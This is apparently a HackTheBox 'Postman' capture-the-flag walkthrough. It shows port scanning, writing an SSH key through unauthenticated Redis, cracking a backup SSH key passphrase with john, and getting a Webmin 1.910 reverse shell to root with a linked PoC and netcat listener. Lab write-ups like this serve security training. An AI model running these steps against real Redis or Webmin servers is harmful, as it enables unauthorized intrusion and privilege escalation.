HackTheBox Postman

# HackTheBox Postman ## 1. Nmap ![](https://i.imgur.com/vVWnRyS.png) * Port 22 : OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) * Port 80 : Apache httpd 2.4.29 ((Ubuntu)) * Port 6379 : Redis key-value store 4.0.9 * Port 10000 : MiniServ 1.910 (Webmin httpd) * Google MiniServ 1.910 * ![](https://i.imgur.com/WthI7oo.png) * CVE-2019-12840 * Need UserName and Passwd! ## Web Server * Language : HTML * View: ![](https://i.imgur.com/nA1YL2Z.jpg) * Gobuster * Payload : `gobuster dir -u "http://postman/" -w /usr/share/seclist/Discovery/Web-Content/raft-small-words.txt -x html` * Interesting dir * /upload/ * Nothig Interesting Here ## 3. Exploit Redis * Check Auth * `redis-cli -h 10.10.10.160` * No Need to Auth * Use SSH To Login As Redis * Check user * `redis-cli -h 10.10.10.160` * `config get dir` * ![](https://i.imgur.com/xKVC24M.png) * Attacker Machine: * `ssh-keygen -t rsa` * `(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt` * `cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key` * Redis(redis-cli -h 10.10.10.160): * `config set dir /var/lib/redis/.ssh` * `config set dbfilename "authorized_keys"` * `save` * Attacker Machine: * `ssh redis@10.10.10.160 -i ~/.ssh/id_rsa` ## 4. Privilage Escalation To Matt * Interesting File: * /opt/id_rsa.bak * Login Matt With SSH * Copy /opt/id_rsa.bak to attacker machine * Try login Matt with this ssh file: * ![](https://i.imgur.com/KrgmLdU.png) * Crack SSH passphrase: * 'ssh2john ssh2john id_rsa > id_rsa.hash ' * `john --wordlist=/usr/share/rockyou.txt id_rsa.hash` * Get passphrase :computer2008 * ![](https://i.imgur.com/v2cYXmO.png) * Login Matt With SSH id_rsa * ![](https://i.imgur.com/B4l0zI8.png) * Failed after we login , connection close. * Login Matt With Su * `su Matt` ,password = computer2008 * ![](https://i.imgur.com/vQTSnkM.png) * Success get user.txt ## 5. Exploit MiniServ 1.910 * Try Login MiniServ 1.910 with Matt * User: Matt * Password: computer2008 * ![](https://i.imgur.com/1oZFnMR.png) * Login Success * Now we can exploit with follow PoC * Target:https://postman:10000/ * PoC Script:[webmin_exploit.py](https://raw.githubusercontent.com/roughiz/Webmin-1.910-Exploit-Script/master/webmin_exploit.py) * Payload : * First use netcat to listen on 9001 port `nc -lvnp 9001` * Then run PoC: `python webmin_exploit.py --rhost 10.10.10.160 --lhost your_ip --rport 10000 --lport 9001 -u Matt -p computer2008 -s True` * ![](https://i.imgur.com/BHFeaOI.png) * ![](https://i.imgur.com/BqO7H4k.png) * Get root!